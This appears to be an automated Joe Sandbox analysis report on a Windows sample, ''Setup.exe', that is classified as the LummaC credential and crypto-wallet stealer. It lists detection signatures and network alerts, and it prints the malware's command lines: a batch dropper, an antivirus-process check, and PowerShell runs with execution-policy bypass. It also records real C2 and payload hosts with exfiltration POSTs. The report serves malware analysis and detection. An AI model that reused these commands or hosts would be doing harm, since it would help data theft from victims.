Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
'Setup.exe

Overview

General Information

Sample name:'Setup.exe
Analysis ID:1565284
MD5:b00b38068b134113eb53676c33a59a93
SHA1:91a7780b1e6e8600c119abe8b49412bc4234751b
SHA256:5a4692e821ef88f689144312c8f273d7e1599d44e8a26952ff7b9f62c4138f02
Tags:exeuser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 'Setup.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\'Setup.exe" MD5: B00B38068B134113EB53676C33A59A93)
    • cmd.exe (PID: 5068 cmdline: "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5800 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4028 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 2180 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3252 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2876 cmdline: cmd /c md 108941 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 5988 cmdline: cmd /c copy /b ..\Lines + ..\Edmonton + ..\Characterization + ..\Tampa + ..\Poet + ..\Artwork + ..\Butts + ..\Harbor A MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Contrast.com (PID: 6180 cmdline: Contrast.com A MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • powershell.exe (PID: 980 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 6208 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • powershell.exe (PID: 3500 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\5TM3JMZQCYKEYRKL75T8.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 6392 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
{"C2 url": ["lumdexibuy.shop"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Contrast.com PID: 6180JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: powershell.exe PID: 980INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x2174f3:$b3: ::UTF8.GetString(
          • 0x10782c:$s1: -join
          • 0x10950d:$s1: -join
          • 0x1ae113:$s1: -join
          • 0x1bb1e8:$s1: -join
          • 0x1be5ba:$s1: -join
          • 0x1bec6c:$s1: -join
          • 0x1c075d:$s1: -join
          • 0x1c2963:$s1: -join
          • 0x1c318a:$s1: -join
          • 0x1c39fa:$s1: -join
          • 0x1c4135:$s1: -join
          • 0x1c4167:$s1: -join
          • 0x1c41af:$s1: -join
          • 0x1c41ce:$s1: -join
          • 0x1c4a1e:$s1: -join
          • 0x1c4b9a:$s1: -join
          • 0x1c4c12:$s1: -join
          • 0x1c4ca5:$s1: -join
          • 0x1c4f0b:$s1: -join
          • 0x1c70a1:$s1: -join
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            amsi32_980.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x2ab:$b3: ::UTF8.GetString(
            • 0x9f47:$s1: -join
            • 0x36f3:$s4: +=
            • 0x37b5:$s4: +=
            • 0x79dc:$s4: +=
            • 0x9af9:$s4: +=
            • 0x9de3:$s4: +=
            • 0x9f29:$s4: +=
            • 0x37a3a:$s4: +=
            • 0x37aba:$s4: +=
            • 0x37b80:$s4: +=
            • 0x37c00:$s4: +=
            • 0x37dd6:$s4: +=
            • 0x37e5a:$s4: +=
            • 0x245:$e1: System.Diagnostics.Process

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Contrast.com A, ParentImage: C:\Users\user\AppData\Local\Temp\108941\Contrast.com, ParentProcessId: 6180, ParentProcessName: Contrast.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", ProcessId: 980, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Contrast.com A, ParentImage: C:\Users\user\AppData\Local\Temp\108941\Contrast.com, ParentProcessId: 6180, ParentProcessName: Contrast.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", ProcessId: 980, ProcessName: powershell.exe
            Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Contrast.com A, ParentImage: C:\Users\user\AppData\Local\Temp\108941\Contrast.com, ParentProcessId: 6180, ParentProcessName: Contrast.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", ProcessId: 980, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\'Setup.exe", ParentImage: C:\Users\user\Desktop\'Setup.exe, ParentProcessId: 7132, ParentProcessName: 'Setup.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd, ProcessId: 5068, ProcessName: cmd.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Contrast.com A, ParentImage: C:\Users\user\AppData\Local\Temp\108941\Contrast.com, ParentProcessId: 6180, ParentProcessName: Contrast.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", ProcessId: 980, ProcessName: powershell.exe

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5068, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3252, ProcessName: findstr.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-29T15:12:37.057575+010020283713Unknown Traffic192.168.2.549754104.21.63.229443TCP
            2024-11-29T15:12:40.949212+010020283713Unknown Traffic192.168.2.549764104.21.63.229443TCP
            2024-11-29T15:12:45.509385+010020283713Unknown Traffic192.168.2.549775104.21.63.229443TCP
            2024-11-29T15:12:49.811182+010020283713Unknown Traffic192.168.2.549786104.21.63.229443TCP
            2024-11-29T15:12:54.229858+010020283713Unknown Traffic192.168.2.549797104.21.63.229443TCP
            2024-11-29T15:12:58.720720+010020283713Unknown Traffic192.168.2.549809104.21.63.229443TCP
            2024-11-29T15:13:02.934746+010020283713Unknown Traffic192.168.2.549819104.21.63.229443TCP
            2024-11-29T15:13:06.798162+010020283713Unknown Traffic192.168.2.549826104.21.63.229443TCP
            2024-11-29T15:13:11.123645+010020283713Unknown Traffic192.168.2.549837104.21.63.229443TCP
            2024-11-29T15:13:15.518575+010020283713Unknown Traffic192.168.2.549848104.20.4.235443TCP
            2024-11-29T15:13:18.026067+010020283713Unknown Traffic192.168.2.549854104.21.58.9443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-29T15:12:39.594075+010020546531A Network Trojan was detected192.168.2.549754104.21.63.229443TCP
            2024-11-29T15:12:43.897693+010020546531A Network Trojan was detected192.168.2.549764104.21.63.229443TCP
            2024-11-29T15:13:14.067850+010020546531A Network Trojan was detected192.168.2.549837104.21.63.229443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-29T15:12:39.594075+010020498361A Network Trojan was detected192.168.2.549754104.21.63.229443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-29T15:12:43.897693+010020498121A Network Trojan was detected192.168.2.549764104.21.63.229443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-29T15:13:05.438371+010020480941Malware Command and Control Activity Detected192.168.2.549819104.21.63.229443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://silversky.club/4b882c8/scriptAvira URL Cloud: Label: malware
            Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["lumdexibuy.shop"]}
            Source: 'Setup.exeReversingLabs: Detection: 13%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 84.9% probability
            Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmpString decryptor: lumdexibuy.shop
            Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 'Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49786 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49809 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49819 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49826 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49848 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.58.9:443 -> 192.168.2.5:49854 version: TLS 1.2
            Source: 'Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2866405600.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbw source: powershell.exe, 00000011.00000002.2880384967.00000000075F3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2880384967.00000000075F3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb% source: powershell.exe, 00000011.00000002.2866405600.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2866405600.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00574005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00574005
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0057C2FF
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_0057494A
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057CD14 FindFirstFileW,FindClose,10_2_0057CD14
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0057CD9F
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0057F5D8
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0057F735
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0057FA36
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00573CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00573CE2
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\108941Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\108941\Jump to behavior

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49754 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49754 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49764 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49764 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49819 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49837 -> 104.21.63.229:443
            Source: Malware configuration extractorURLs: lumdexibuy.shop
            Source: unknownDNS query: name: pastebin.com
            Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
            Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49754 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49764 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49797 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49819 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49775 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49826 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49809 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49786 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49837 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49848 -> 104.20.4.235:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49854 -> 104.21.58.9:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PZGP4FN1MNJNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12799Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4SWC7R2U0LS2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15041Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=082MXLHK4KN3NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20537Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YQUFHPP0DGAK0AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7064Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HX3TOI8KOQNOLIDMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1214Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PTOPGS84MNK72User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1105Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 114Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: GET /raw/erLX7UsT HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: pastebin.com
            Source: global trafficHTTP traffic detected: GET /4b882c8/script HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: silversky.club
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
